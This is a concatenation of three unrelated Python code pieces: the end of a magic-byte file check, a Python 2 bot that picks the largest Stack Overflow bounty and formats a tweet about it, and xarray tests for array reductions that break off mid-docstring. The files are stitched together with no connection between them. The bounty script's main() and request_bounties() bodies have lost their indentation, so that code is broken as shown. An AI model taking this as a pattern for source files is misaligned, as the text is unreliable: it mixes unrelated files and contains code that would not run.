    Parameters
    ----------
    path_or_buffer: str path or file-like object opened in binary mode
    """
    if is_str(path_or_buffer):
        fp = open(path_or_buffer, 'rb')
        owns_handle = True
    else:
        fp = path_or_buffer
        owns_handle = False
    try:
        return fp.read(len(MAGIC)) == MAGIC
    finally:
        # Only close handles we opened ourselves.
        if owns_handle:
            fp.close()
| |
# Downloads 'featured' (bountied) questions from Stack Overflow, picks the
# most interesting one based on the amount of the bounty and the score of
# the question, then posts a link to the question on Twitter.
#
# Author: Bill Cruise
# (Bill the Lizard on Stack Overflow, @lizardbill on Twitter)
#
# Dependencies: tweepy (https://github.com/tweepy/tweepy)
# Stack Exchange API: https://api.stackexchange.com/docs
# Twitter API: https://dev.twitter.com/
import json
import sys
import tweepy
import calendar
import ConfigParser
import HTMLParser
from tweepy import *
from ConfigParser import NoSectionError, NoOptionError
from time import gmtime, strftime
from urllib2 import urlopen, URLError
from zlib import decompress, MAX_WBITS
HOURS = 8  # width of the bounty-expiration search window, in hours
USER_ID = 1288  # Your Stack Overflow user id for sharing links
MAX_TWEET_LEN = 140  # Twitter's (historical) status character limit
DATE_FORMAT = "%Y %b %d %H:%M:%S UTC"  # timestamp format for logs/output
def main():
# Get UTC time now and 8 hours ago.
to_time = calendar.timegm(gmtime())
print 'Time Now:', strftime(DATE_FORMAT, gmtime(to_time))
from_time = to_time - (HOURS * 60 * 60)
# Add 7 days to those times for bounty expiration comparison.
# Unfortunately bounty sort orders are not based on the time the bounty
# was posted or expires, but on the time the question was posted.
from_time += (7 * 24 * 60 * 60)
to_time += (7 * 24 * 60 * 60)
from_time_displ = strftime(DATE_FORMAT, gmtime(from_time))
to_time_displ = strftime(DATE_FORMAT, gmtime(to_time))
print 'Expiration target window:'
print from_time_displ
print to_time_displ
print
window_msg = 'Target Window: ' + from_time_displ + ' to ' + to_time_displ
log('status.log', window_msg)
try:
recent_bounties = request_bounties(from_time, to_time)
max_bounty = find_max(recent_bounties)
print '** Maximum Bounty **'
display(max_bounty)
status = format_status_msg(max_bounty)
print status
log('status.log', status)
close_time = gmtime(max_bounty['bounty_closes_date'])
close_time_fmt = strftime(DATE_FORMAT, close_time)
closes_msg = 'Bounty Closes: ' + close_time_fmt
log('status.log', closes_msg)
# tweet(status)
except TweepError:
print 'TweepError: ', sys.exc_info()[0]
log('error.log', 'TweepError: ' + str(sys.exc_info()[0]) + str(sys.exc_info()[1]))
log('error.log', status)
except URLError:
print 'URLError: ', sys.exc_info()[0]
log('error.log', 'URLError: ' + str(sys.exc_info()[0]) + str(sys.exc_info()[1]))
log('error.log', status)
except:
print 'Unexpected error:', sys.exc_info()[0]
log('error.log', 'Unexpected error: ' + str(sys.exc_info()[0]) + str(sys.exc_info()[1]))
log('error.log', status)
# Get a list of new bounty questions from Stack Overflow.
def request_bounties(from_time, to_time):
config = ConfigParser.RawConfigParser()
config.read('settings.cfg')
se_oauth_key = None
try:
se_oauth_key = CONSUMER_KEY = config.get('Stack Exchange OAuth', 'KEY')
except (NoSectionError, NoOptionError) as e:
pass
page = 1
page_size = 100
has_more = True
count = 1
recent_bounties = []
while(has_more):
request = 'https://api.stackexchange.com/2.1/questions/featured'
request += '?page=' + str(page) + '&pagesize=100'
request += '&order=asc&sort=activity&site=stackoverflow'
if se_oauth_key != None:
request += '&key=' + se_oauth_key
response = urlopen(request)
raw_data = response.read()
json_data = decompress(raw_data, 16 + MAX_WBITS).decode('UTF-8')
data = json.loads(json_data)
bounties = data['items']
has_more = data['has_more']
for bounty in bounties:
close = bounty['bounty_closes_date']
if from_time < close and close < to_time:
recent_bounties.append(bounty)
print 'Bounty:', count
print 'Closes:', close
display(bounty)
count += 1
page += 1
return recent_bounties
# Display the contents of a JSON bounty string.
def display(bounty):
    """Pretty-print the interesting fields of one bounty dict to stdout."""
    print bounty['title']
    print 'Tags:', bounty['tags']
    print 'Bounty Amount:', bounty['bounty_amount']
    print 'Question Score:', bounty['score']
    # bounty_closes_date is epoch seconds; render it in the log format.
    close_time = gmtime(bounty['bounty_closes_date'])
    close_time_fmt = strftime(DATE_FORMAT, close_time)
    print 'Bounty Closes:', close_time_fmt
    print 'View Count:', bounty['view_count']
    print 'Question Id:', bounty['question_id']
    print 'Is Answered:', bounty['is_answered']
    print
# Find the maximum bounty.
# Give preference to highest scoring question in case of bounty ties.
def find_max(bounties):
    """Return the bounty dict with the largest (amount, score) pair.

    Ties on both amount and score keep the earliest entry.  Returns the
    empty string when *bounties* is empty (legacy sentinel).
    """
    best = ''
    best_amount = 0
    best_score = 0
    for candidate in bounties:
        amount = candidate['bounty_amount']
        score = candidate['score']
        # Lexicographic tuple comparison: higher amount wins outright,
        # equal amounts fall back to the higher question score.
        if (amount, score) > (best_amount, best_score):
            best = candidate
            best_amount = amount
            best_score = score
    return best
# Format a JSON bounty string into a 140-character status message.
def format_status_msg(bounty_json):
    """Build the tweet text: title + question link + bounty amount + tags."""
    bounty_title = bounty_json['title']
    # Titles arrive HTML-escaped from the API; unescape for display.
    h = HTMLParser.HTMLParser()
    bounty_title = h.unescape(bounty_title)
    # The /q/<id>/<user_id> form credits USER_ID for the shared link.
    bounty_link = 'http://stackoverflow.com/q/'
    bounty_link += str(bounty_json['question_id']) + '/' + str(USER_ID)
    details = 'Amt:' + str(bounty_json['bounty_amount'])
    tags = bounty_json['tags']
    tag = hashify(tags[0])
    details += ' ' + tag
    # The URL in the status message will be shortened to
    # 22 characters (24 with surrounding spaces)
    # https://dev.twitter.com/blog/upcoming-tco-changes
    msg_length = len(bounty_title) + 24 + len(details)
    # Truncate the title to fit in a 140 character status message
    if msg_length > MAX_TWEET_LEN:
        allowed_title_len = MAX_TWEET_LEN - (24 + len(details))
        # Reserve 3 chars for the ellipsis, then back up to a word boundary.
        bounty_title = bounty_title[0:allowed_title_len-3]
        bounty_title = bounty_title.rpartition(' ')[0] + '...'
    status = bounty_title + ' ' + bounty_link + ' ' + details
    # Add more tags if they'll fit in the 140-character limit
    tag_index = 1
    while tag_index < len(tags):
        tag = hashify(tags[tag_index])
        if (len(status) + len(tag) + 1) < MAX_TWEET_LEN:
            status += (' ' + tag)
        tag_index += 1
    return status
# Update the Twitter account authorized
# in settings.cfg with a status message.
def tweet(status):
    """Post *status* to Twitter using OAuth credentials from settings.cfg."""
    config = ConfigParser.RawConfigParser()
    config.read('settings.cfg')
    # http://dev.twitter.com/apps/myappid
    CONSUMER_KEY = config.get('Twitter OAuth', 'CONSUMER_KEY')
    CONSUMER_SECRET = config.get('Twitter OAuth', 'CONSUMER_SECRET')
    # http://dev.twitter.com/apps/myappid/my_token
    ACCESS_TOKEN_KEY = config.get('Twitter OAuth', 'ACCESS_TOKEN_KEY')
    ACCESS_TOKEN_SECRET = config.get('Twitter OAuth', 'ACCESS_TOKEN_SECRET')
    auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
    auth.set_access_token(ACCESS_TOKEN_KEY, ACCESS_TOKEN_SECRET)
    api = tweepy.API(auth)
    # Return value intentionally unused; kept in a local for debugging.
    result = api.update_status(status)
# Converts a Stack Overflow tag to a Twitter hashtag.
# The most common tags with special characters are covered,
# with special cases added as needed. (consider retagging on SO)
def hashify(tag):
    """Return '#' + a Twitter-safe CamelCase form of a Stack Overflow tag."""
    # Explicit mapping for tags whose punctuation ('.', '#', '+') would be
    # lost or illegal in a hashtag.
    tag_dict = {'c++':'cpp', 'c#':'csharp', 'f#':'fsharp',
                'asp.net':'ASPdotNET', '.net':'dotNET',
                'objective-c':'ObjectiveC', 'xml-parsing':'XMLparsing',
                'ruby-on-rails':'RubyOnRails', 'ruby-on-rails-3':'RubyOnRails3',
                'sql-server':'SQLServer', 'sql-server-2005':'SQLServer2005',
                'sql-server-2008':'SQLServer2008',
                'asp.net-mvc':'ASPdotNetMVC', 'asp.net-mvc-2':'ASPdotNetMVC2',
                'asp.net-mvc-3':'ASPdotNetMVC3', 'asp.net-mvc-4':'ASPdotNetMVC4',
                'asp.net-mvc-5':'ASPdotNetMVC5', 'asp.net-mvc-6':'ASPdotNetMVC6',
                'vb.net':'VBdotNET', 'visual-studio':'VisualStudio',
                'visual-studio-2010':'VS2010',
                'web-services':'webservices', 'ActionScript3':'ActionScript3',
                'cocoa-touch':'CocoaTouch', 'entity-framework':'EntityFramework',
                'jquery-ui':'jqueryUI', 'node.js':'NodeJS',
                'internet-explorer':'IE', '.htaccess':'htaccess',
                'unit-testing':'UnitTesting', 'windows-phone-7':'WindowsPhone7',
                'google-maps':'GoogleMaps', 'android-layout':'androidlayout'
                }
    tag = tag_dict.get(tag, tag)  # returns either mapping or the original tag
    tag = remove_hyphens(tag)
    # Catch-all for unmapped *.js tags (e.g. 'backbone.js' -> 'backbone').
    tag = tag.replace(".js", "")
    return '#' + tag
# Removes hyphens from a tag and capitalizes each word.
def remove_hyphens(tag):
    """CamelCase a hyphenated tag: 'ruby-on-rails' -> 'RubyOnRails'.

    An empty segment (from consecutive hyphens) is kept as a literal '-'.
    """
    pieces = tag.split('-')
    camel = [piece.capitalize() or '-' for piece in pieces]
    return ''.join(camel)
# Write a timestamped message to the specified log file.
def log(filename, message):
    """Append *message* to *filename*, prefixed with a UTC timestamp."""
    stamp = strftime(DATE_FORMAT + ': ', gmtime())
    with open(filename, 'a') as handle:
        handle.write(stamp + message + '\n')
# Script entry point: run only when executed directly, not on import.
if __name__ == '__main__':
    main()
| |
import warnings
from textwrap import dedent
import numpy as np
import pandas as pd
import pytest
from numpy import array, nan
from xarray import DataArray, Dataset, cftime_range, concat
from xarray.core import dtypes, duck_array_ops
from xarray.core.duck_array_ops import (
array_notnull_equiv,
concatenate,
count,
first,
gradient,
last,
mean,
rolling_window,
stack,
where,
)
from xarray.core.pycompat import dask_array_type
from xarray.testing import assert_allclose, assert_equal
from . import (
arm_xfail,
assert_array_equal,
has_dask,
raises_regex,
requires_cftime,
requires_dask,
)
class TestOps:
    """Tests for first/last/count/where/stack/concatenate/mean ops."""

    @pytest.fixture(autouse=True)
    def setUp(self):
        # 2 x 3 x 4 float fixture with NaNs sprinkled in so that skipna
        # code paths are exercised along every axis.
        self.x = array(
            [
                [[nan, nan, 2.0, nan], [nan, 5.0, 6.0, nan], [8.0, 9.0, 10.0, nan]],
                [
                    [nan, 13.0, 14.0, 15.0],
                    [nan, 17.0, 18.0, nan],
                    [nan, 21.0, nan, nan],
                ],
            ]
        )

    def test_first(self):
        # One expected array per positive axis; doubling the list covers
        # the equivalent negative axes.
        expected_results = [
            array([[nan, 13, 2, 15], [nan, 5, 6, nan], [8, 9, 10, nan]]),
            array([[8, 5, 2, nan], [nan, 13, 14, 15]]),
            array([[2, 5, 8], [13, 17, 21]]),
        ]
        for axis, expected in zip([0, 1, 2, -3, -2, -1], 2 * expected_results):
            actual = first(self.x, axis)
            assert_array_equal(expected, actual)
        # skipna=False returns the positional first slice, NaNs included.
        expected = self.x[0]
        actual = first(self.x, axis=0, skipna=False)
        assert_array_equal(expected, actual)
        expected = self.x[..., 0]
        actual = first(self.x, axis=-1, skipna=False)
        assert_array_equal(expected, actual)
        with raises_regex(IndexError, "out of bounds"):
            first(self.x, 3)

    def test_last(self):
        expected_results = [
            array([[nan, 13, 14, 15], [nan, 17, 18, nan], [8, 21, 10, nan]]),
            array([[8, 9, 10, nan], [nan, 21, 18, 15]]),
            array([[2, 6, 10], [15, 18, 21]]),
        ]
        for axis, expected in zip([0, 1, 2, -3, -2, -1], 2 * expected_results):
            actual = last(self.x, axis)
            assert_array_equal(expected, actual)
        # skipna=False returns the positional last slice, NaNs included.
        expected = self.x[-1]
        actual = last(self.x, axis=0, skipna=False)
        assert_array_equal(expected, actual)
        expected = self.x[..., -1]
        actual = last(self.x, axis=-1, skipna=False)
        assert_array_equal(expected, actual)
        with raises_regex(IndexError, "out of bounds"):
            last(self.x, 3)

    def test_count(self):
        # The fixture holds 12 non-NaN entries overall.
        assert 12 == count(self.x)
        expected = array([[1, 2, 3], [3, 2, 1]])
        assert_array_equal(expected, count(self.x, axis=-1))
        # A scalar datetime counts as a single element.
        assert 1 == count(np.datetime64("2000-01-01"))

    def test_where_type_promotion(self):
        # Mixing int and str promotes the result to object dtype.
        result = where([True, False], [1, 2], ["a", "b"])
        assert_array_equal(result, np.array([1, "b"], dtype=object))
        # float32 must survive promotion against a NaN fill.
        result = where([True, False], np.array([1, 2], np.float32), np.nan)
        assert result.dtype == np.float32
        assert_array_equal(result, np.array([1, np.nan], dtype=np.float32))

    def test_stack_type_promotion(self):
        result = stack([1, "b"])
        assert_array_equal(result, np.array([1, "b"], dtype=object))

    def test_concatenate_type_promotion(self):
        result = concatenate([[1], ["b"]])
        assert_array_equal(result, np.array([1, "b"], dtype=object))

    def test_all_nan_arrays(self):
        # Silence numpy's all-NaN warnings; the NaN result is the point.
        with warnings.catch_warnings():
            warnings.filterwarnings("ignore", "All-NaN slice")
            warnings.filterwarnings("ignore", "Mean of empty slice")
            assert np.isnan(mean([np.nan, np.nan]))
def test_cumsum_1d():
    """cumsum over 1-d input: default, explicit, negative and tuple axes."""
    data = np.array([0, 1, 2, 3])
    running = np.array([0, 1, 3, 6])
    assert_array_equal(running, duck_array_ops.cumsum(data))
    for axis in (0, -1, (0,)):
        assert_array_equal(running, duck_array_ops.cumsum(data, axis=axis))
    # An empty axis tuple is a no-op.
    assert_array_equal(data, duck_array_ops.cumsum(data, axis=()))
def test_cumsum_2d():
    """cumsum over every axis of a 2-d array equals the flat running sum."""
    data = np.array([[1, 2], [3, 4]])
    accumulated = np.array([[1, 3], [4, 10]])
    assert_array_equal(accumulated, duck_array_ops.cumsum(data))
    assert_array_equal(accumulated, duck_array_ops.cumsum(data, axis=(0, 1)))
    # An empty axis tuple is a no-op.
    assert_array_equal(data, duck_array_ops.cumsum(data, axis=()))
def test_cumprod_2d():
    """cumprod over every axis of a 2-d array equals the flat running product."""
    data = np.array([[1, 2], [3, 4]])
    accumulated = np.array([[1, 2], [3, 2 * 3 * 4]])
    assert_array_equal(accumulated, duck_array_ops.cumprod(data))
    assert_array_equal(accumulated, duck_array_ops.cumprod(data, axis=(0, 1)))
    # An empty axis tuple is a no-op.
    assert_array_equal(data, duck_array_ops.cumprod(data, axis=()))
class TestArrayNotNullEquiv:
    """Tests for array_notnull_equiv: equality ignoring null positions."""

    @pytest.mark.parametrize(
        "arr1, arr2",
        [
            (np.array([1, 2, 3]), np.array([1, 2, 3])),
            (np.array([1, 2, np.nan]), np.array([1, np.nan, 3])),
            (np.array([np.nan, 2, np.nan]), np.array([1, np.nan, np.nan])),
        ],
    )
    def test_equal(self, arr1, arr2):
        # A NaN in either operand masks that position from comparison.
        assert array_notnull_equiv(arr1, arr2)

    def test_some_not_equal(self):
        a = np.array([1, 2, 4])
        b = np.array([1, np.nan, 3])
        assert not array_notnull_equiv(a, b)

    def test_wrong_shape(self):
        # Mismatched shapes are never equivalent, regardless of nulls.
        a = np.array([[1, np.nan, np.nan, 4]])
        b = np.array([[1, 2], [np.nan, 4]])
        assert not array_notnull_equiv(a, b)

    @pytest.mark.parametrize(
        "val1, val2, val3, null",
        [
            (
                np.datetime64("2000"),
                np.datetime64("2001"),
                np.datetime64("2002"),
                np.datetime64("NaT"),
            ),
            (1.0, 2.0, 3.0, np.nan),
            ("foo", "bar", "baz", None),
            ("foo", "bar", "baz", np.nan),
        ],
    )
    def test_types(self, val1, val2, val3, null):
        # Object dtype keeps None/np.nan nulls intact for string arrays.
        dtype = object if isinstance(val1, str) else None
        arr1 = np.array([val1, null, val3, null], dtype=dtype)
        arr2 = np.array([val1, val2, null, null], dtype=dtype)
        assert array_notnull_equiv(arr1, arr2)
def construct_dataarray(dim_num, dtype, contains_nan, dask):
    """Build a random DataArray fixture.

    dim_num (<= 3) selects how many of the dims ("x", "y", "z") with sizes
    (16, 8, 4) are used; dtype picks the value kind; contains_nan replaces
    ~20% of elements with the dtype's fill value (promoting the dtype when
    needed, e.g. int -> float); dask chunks the result when available.
    """
    # Fixed seed so every parametrized test sees identical data.
    rng = np.random.RandomState(0)
    shapes = [16, 8, 4][:dim_num]
    dims = ("x", "y", "z")[:dim_num]
    if np.issubdtype(dtype, np.floating):
        array = rng.randn(*shapes).astype(dtype)
    elif np.issubdtype(dtype, np.integer):
        array = rng.randint(0, 10, size=shapes).astype(dtype)
    elif np.issubdtype(dtype, np.bool_):
        array = rng.randint(0, 1, size=shapes).astype(dtype)
    elif dtype == str:
        array = rng.choice(["a", "b", "c", "d"], size=shapes)
    else:
        raise ValueError
    if contains_nan:
        # Promote first so the fill value (e.g. NaN) is representable.
        inds = rng.choice(range(array.size), int(array.size * 0.2))
        dtype, fill_value = dtypes.maybe_promote(array.dtype)
        array = array.astype(dtype)
        array.flat[inds] = fill_value
    da = DataArray(array, dims=dims, coords={"x": np.arange(16)}, name="da")
    if dask and has_dask:
        chunks = {d: 4 for d in dims}
        da = da.chunk(chunks)
    return da
def from_series_or_scalar(se):
    """Wrap a pandas Series (or a bare scalar) in a DataArray."""
    if not isinstance(se, pd.Series):
        # scalar case: pandas reductions over all dims return a scalar
        return DataArray(se)
    return DataArray.from_series(se)
def series_reduce(da, func, dim, **kwargs):
    """Convert a DataArray to pd.Series, apply the pandas reduction *func*,
    then convert back to a DataArray.

    Multiple dims cannot be specified.  pandas reductions are 1-d, so for
    higher-rank input the array is sliced along a non-reduced dim, each
    slice is reduced recursively, and the results are re-concatenated.
    """
    if dim is None or da.ndim == 1:
        se = da.to_series()
        return from_series_or_scalar(getattr(se, func)(**kwargs))
    else:
        da1 = []
        dims = list(da.dims)
        dims.remove(dim)
        d = dims[0]
        for i in range(len(da[d])):
            da1.append(series_reduce(da.isel(**{d: i}), func, dim, **kwargs))
        # Concatenate along the coordinate when the slicing dim carries one.
        if d in da.coords:
            return concat(da1, dim=da[d])
        return concat(da1, dim=d)
def assert_dask_array(da, dask):
    """When *dask* is requested, assert a non-scalar result stayed lazy."""
    if not dask or da.ndim == 0:
        return
    assert isinstance(da.data, dask_array_type)
@arm_xfail
@pytest.mark.parametrize("dask", [False, True])
def test_datetime_reduce(dask):
    """mean over a datetime64 coordinate must honor skipna and 0-d input."""
    time = np.array(pd.date_range("15/12/1999", periods=11))
    # Trailing NaT values exercise the skipna code path.
    time[8:11] = np.nan
    da = DataArray(np.linspace(0, 365, num=11), dims="time", coords={"time": time})
    if dask and has_dask:
        chunks = {"time": 5}
        da = da.chunk(chunks)
    actual = da["time"].mean()
    assert not pd.isnull(actual)
    # With skipna=False the NaT values poison the mean.
    actual = da["time"].mean(skipna=False)
    assert pd.isnull(actual)
    # test for a 0d array
    assert da["time"][0].mean() == da["time"][:1].mean()
@requires_cftime
def test_cftime_datetime_mean():
    """mean of cftime datetimes: 0-d identity plus 1-d and 2-d midpoints."""
    times = cftime_range("2000", periods=4)
    da = DataArray(times, dims=["time"])
    # The mean of a single element is that element.
    assert da.isel(time=0).mean() == da.isel(time=0)
    # Midpoint of four daily stamps from 2000-01-01 is Jan 2 at 12:00.
    expected = DataArray(times.date_type(2000, 1, 2, 12))
    result = da.mean()
    assert_equal(result, expected)
    # Reshaping to 2-d must not change the overall mean.
    da_2d = DataArray(times.values.reshape(2, 2))
    result = da_2d.mean()
    assert_equal(result, expected)
@requires_cftime
@requires_dask
def test_cftime_datetime_mean_dask_error():
    """mean of chunked cftime data is unimplemented and must raise."""
    stamps = cftime_range("2000", periods=4)
    chunked = DataArray(stamps, dims=["time"]).chunk()
    with pytest.raises(NotImplementedError):
        chunked.mean()
@pytest.mark.parametrize("dim_num", [1, 2])
@pytest.mark.parametrize("dtype", [float, int, np.float32, np.bool_])
@pytest.mark.parametrize("dask", [False, True])
@pytest.mark.parametrize("func", ["sum", "min", "max", "mean", "var"])
# TODO test cumsum, cumprod
@pytest.mark.parametrize("skipna", [False, True])
@pytest.mark.parametrize("aggdim", [None, "x"])
def test_reduce(dim_num, dtype, dask, func, skipna, aggdim):
    """Cross-check xarray reductions against numpy and pandas references."""
    if aggdim == "y" and dim_num < 2:
        pytest.skip("dim not in this test")
    if dtype == np.bool_ and func == "mean":
        pytest.skip("numpy does not support this")
    if dask and not has_dask:
        pytest.skip("requires dask")
    if dask and skipna is False and dtype in [np.bool_]:
        pytest.skip("dask does not compute object-typed array")
    # float32 accumulates more rounding error; loosen the tolerance.
    rtol = 1e-04 if dtype == np.float32 else 1e-05
    da = construct_dataarray(dim_num, dtype, contains_nan=True, dask=dask)
    axis = None if aggdim is None else da.get_axis_num(aggdim)
    # TODO: remove these after resolving
    # https://github.com/dask/dask/issues/3245
    with warnings.catch_warnings():
        warnings.filterwarnings("ignore", "Mean of empty slice")
        warnings.filterwarnings("ignore", "All-NaN slice")
        warnings.filterwarnings("ignore", "invalid value encountered in")
        if da.dtype.kind == "O" and skipna:
            # Numpy < 1.13 does not handle object-type array.
            try:
                if skipna:
                    expected = getattr(np, f"nan{func}")(da.values, axis=axis)
                else:
                    expected = getattr(np, func)(da.values, axis=axis)
                actual = getattr(da, func)(skipna=skipna, dim=aggdim)
                assert_dask_array(actual, dask)
                assert np.allclose(
                    actual.values, np.array(expected), rtol=1.0e-4, equal_nan=True
                )
            except (TypeError, AttributeError, ZeroDivisionError):
                # TODO currently, numpy does not support some methods such as
                # nanmean for object dtype
                pass
        actual = getattr(da, func)(skipna=skipna, dim=aggdim)
        # for dask case, make sure the result is the same for numpy backend
        expected = getattr(da.compute(), func)(skipna=skipna, dim=aggdim)
        assert_allclose(actual, expected, rtol=rtol)
        # make sure the compatiblility with pandas' results.
        if func in ["var", "std"]:
            # pandas defaults to ddof=1; pin ddof=0 to match xarray.
            expected = series_reduce(da, func, skipna=skipna, dim=aggdim, ddof=0)
            assert_allclose(actual, expected, rtol=rtol)
            # also check ddof!=0 case
            actual = getattr(da, func)(skipna=skipna, dim=aggdim, ddof=5)
            if dask:
                assert isinstance(da.data, dask_array_type)
            expected = series_reduce(da, func, skipna=skipna, dim=aggdim, ddof=5)
            assert_allclose(actual, expected, rtol=rtol)
        else:
            expected = series_reduce(da, func, skipna=skipna, dim=aggdim)
            assert_allclose(actual, expected, rtol=rtol)
        # make sure the dtype argument
        if func not in ["max", "min"]:
            actual = getattr(da, func)(skipna=skipna, dim=aggdim, dtype=float)
            assert_dask_array(actual, dask)
            assert actual.dtype == float
        # without nan
        da = construct_dataarray(dim_num, dtype, contains_nan=False, dask=dask)
        actual = getattr(da, func)(skipna=skipna)
        if dask:
            assert isinstance(da.data, dask_array_type)
        expected = getattr(np, f"nan{func}")(da.values)
        if actual.dtype == object:
            assert actual.values == np.array(expected)
        else:
            assert np.allclose(actual.values, np.array(expected), rtol=rtol)
@pytest.mark.parametrize("dim_num", [1, 2])
@pytest.mark.parametrize("dtype", [float, int, np.float32, np.bool_, str])
@pytest.mark.parametrize("contains_nan", [True, False])
@pytest.mark.parametrize("dask", [False, True])
@pytest.mark.parametrize("func", ["min", "max"])
@pytest.mark.parametrize("skipna", [False, True])
@pytest.mark.parametrize("aggdim", ["x", "y"])
def test_argmin_max(dim_num, dtype, contains_nan, dask, func, skipna, aggdim):
    """Check argmin/argmax consistency with min/max (not with pandas)."""
    # pandas-dev/pandas#16830, we do not check consistency with pandas but
    # just make sure da[da.argmin()] == da.min()
    if aggdim == "y" and dim_num < 2:
        pytest.skip("dim not in this test")
    if dask and not has_dask:
        pytest.skip("requires dask")
    if contains_nan:
        if not skipna:
            pytest.skip(
                "numpy's argmin (not nanargmin) does not handle " "object-dtype"
            )
        if skipna and np.dtype(dtype).kind in "iufc":
            pytest.skip("numpy's nanargmin raises ValueError for all nan axis")
    da = construct_dataarray(dim_num, dtype, contains_nan=contains_nan, dask=dask)
    with warnings.catch_warnings():
        warnings.filterwarnings("ignore", "All-NaN slice")
        # Indexing at the arg-extremum must land on the extremum itself.
        actual = da.isel(
            **{aggdim: getattr(da, "arg" + func)(dim=aggdim, skipna=skipna).compute()}
        )
        expected = getattr(da, func)(dim=aggdim, skipna=skipna)
        assert_allclose(actual.drop(actual.coords), expected.drop(expected.coords))
def test_argmin_max_error():
    """argmin must raise when an all-NaN slice exists along the dim."""
    da = construct_dataarray(2, np.bool_, contains_nan=True, dask=False)
    # Force an entire row to NaN so nanargmin has no valid candidate.
    da[0] = np.nan
    with pytest.raises(ValueError):
        da.argmin(dim="y")
@pytest.mark.parametrize(
    "array",
    [
        np.array([np.datetime64("2000-01-01"), np.datetime64("NaT")]),
        np.array([np.timedelta64(1, "h"), np.timedelta64("NaT")]),
        np.array([0.0, np.nan]),
        np.array([1j, np.nan]),
        np.array(["foo", np.nan], dtype=object),
    ],
)
def test_isnull(array):
    """isnull recognizes NaT/NaN/None across datetime, numeric and object dtypes."""
    actual = duck_array_ops.isnull(array)
    np.testing.assert_equal(np.array([False, True]), actual)
@requires_dask
def test_isnull_with_dask():
    """isnull stays lazy on dask input and matches the eager result."""
    da = construct_dataarray(2, np.float32, contains_nan=True, dask=True)
    lazy_mask = da.isnull()
    assert isinstance(lazy_mask.data, dask_array_type)
    assert_equal(lazy_mask.load(), da.load().isnull())
@pytest.mark.skipif(not has_dask, reason="This is for dask.")
@pytest.mark.parametrize("axis", [0, -1])
@pytest.mark.parametrize("window", [3, 8, 11])
@pytest.mark.parametrize("center", [True, False])
def test_dask_rolling(axis, window, center):
    """rolling_window on a chunked array must match the numpy result."""
    import dask.array as da

    x = np.array(np.random.randn(100, 40), dtype=float)
    # Uneven chunking along axis 0 exercises chunk-boundary handling.
    dx = da.from_array(x, chunks=[(6, 30, 30, 20, 14), 8])
    expected = rolling_window(
        x, axis=axis, window=window, center=center, fill_value=np.nan
    )
    actual = rolling_window(
        dx, axis=axis, window=window, center=center, fill_value=np.nan
    )
    assert isinstance(actual, da.Array)
    assert_array_equal(actual, expected)
    assert actual.shape == expected.shape
    # we need to take care of window size if chunk size is small
    # window/2 should be smaller than the smallest chunk size.
    with pytest.raises(ValueError):
        rolling_window(dx, axis=axis, window=100, center=center, fill_value=np.nan)
@pytest.mark.skipif(not has_dask, reason="This is for dask.")
@pytest.mark.parametrize("axis", [0, -1, 1])
@pytest.mark.parametrize("edge_order", [1, 2])
def test_dask_gradient(axis, edge_order):
    """gradient over a chunked dask array equals the numpy gradient."""
    import dask.array as da

    values = np.array(np.random.randn(100, 5, 40))
    # Non-uniform coordinate along the differentiation axis.
    coord = np.exp(np.linspace(0, 1, values.shape[axis]))
    chunked = da.from_array(values, chunks=[(6, 30, 30, 20, 14), 5, 8])

    expected = gradient(values, coord, axis=axis, edge_order=edge_order)
    actual = gradient(chunked, coord, axis=axis, edge_order=edge_order)

    assert isinstance(actual, da.Array)
    assert_array_equal(actual, expected)
@pytest.mark.parametrize("dim_num", [1, 2])
@pytest.mark.parametrize("dtype", [float, int, np.float32, np.bool_])
@pytest.mark.parametrize("dask", [False, True])
@pytest.mark.parametrize("func", ["sum", "prod"])
@pytest.mark.parametrize("aggdim", [None, "x"])
def test_min_count(dim_num, dtype, dask, func, aggdim):
    """min_count-aware reductions agree with the pandas-based reference."""
    if dask and not has_dask:
        pytest.skip("requires dask")

    arr = construct_dataarray(dim_num, dtype, contains_nan=True, dask=dask)
    min_count = 3
    result = getattr(arr, func)(dim=aggdim, skipna=True, min_count=min_count)
    reference = series_reduce(arr, func, skipna=True, dim=aggdim, min_count=min_count)
    assert_allclose(result, reference)
    # Laziness must be preserved when the input is dask-backed.
    assert_dask_array(result, dask)
@pytest.mark.parametrize("func", ["sum", "prod"])
def test_min_count_dataset(func):
    """Dataset-level reduction with min_count matches the DataArray one."""
    arr = construct_dataarray(2, dtype=float, contains_nan=True, dask=False)
    dataset = Dataset({"var1": arr}, coords={"scalar": 0})
    from_ds = getattr(dataset, func)(dim="x", skipna=True, min_count=3)["var1"]
    from_da = getattr(dataset["var1"], func)(dim="x", skipna=True, min_count=3)
    assert_allclose(from_ds, from_da)
@pytest.mark.parametrize("dtype", [float, int, np.float32, np.bool_])
@pytest.mark.parametrize("dask", [False, True])
@pytest.mark.parametrize("func", ["sum", "prod"])
def test_multiple_dims(dtype, dask, func):
    """Reducing over two dims at once equals reducing them one at a time."""
    if dask and not has_dask:
        pytest.skip("requires dask")
    arr = construct_dataarray(3, dtype, contains_nan=True, dask=dask)

    joint = getattr(arr, func)(("x", "y"))
    sequential = getattr(getattr(arr, func)("x"), func)("y")
    assert_allclose(joint, sequential)
def test_docs():
    """Check the injected reduction docstrings character-for-character,
    both for a reduction that accepts ``min_count`` (sum) and one that
    does not (std)."""
    # with min_count
    actual = DataArray.sum.__doc__
    expected = dedent(
        """\
Reduce this DataArray's data by applying `sum` along some dimension(s).
Parameters
----------
dim : str or sequence of str, optional
Dimension(s) over which to apply `sum`.
axis : int or sequence of int, optional
Axis(es) over which to apply `sum`. Only one of the 'dim'
and 'axis' arguments can be supplied. If neither are supplied, then
`sum` is calculated over axes.
skipna : bool, optional
If True, skip missing values (as marked by NaN). By default, only
skips missing values for float dtypes; other dtypes either do not
have a sentinel missing value (int) or skipna=True has not been
implemented (object, datetime64 or timedelta64).
min_count : int, default None
The required number of valid values to perform the operation.
If fewer than min_count non-NA values are present the result will
be NA. New in version 0.10.8: Added with the default being None.
keep_attrs : bool, optional
If True, the attributes (`attrs`) will be copied from the original
object to the new one. If False (default), the new object will be
returned without attributes.
**kwargs : dict
Additional keyword arguments passed on to the appropriate array
function for calculating `sum` on this object's data.
Returns
-------
reduced : DataArray
New DataArray object with `sum` applied to its data and the
indicated dimension(s) removed.
"""
    )
    assert actual == expected
    # without min_count
    actual = DataArray.std.__doc__
    expected = dedent(
        """\
Reduce this DataArray's data by applying `std` along some dimension(s).
Parameters
----------
dim : str or sequence of str, optional
Dimension(s) over which to apply `std`.
axis : int or sequence of int, optional
Axis(es) over which to apply `std`. Only one of the 'dim'
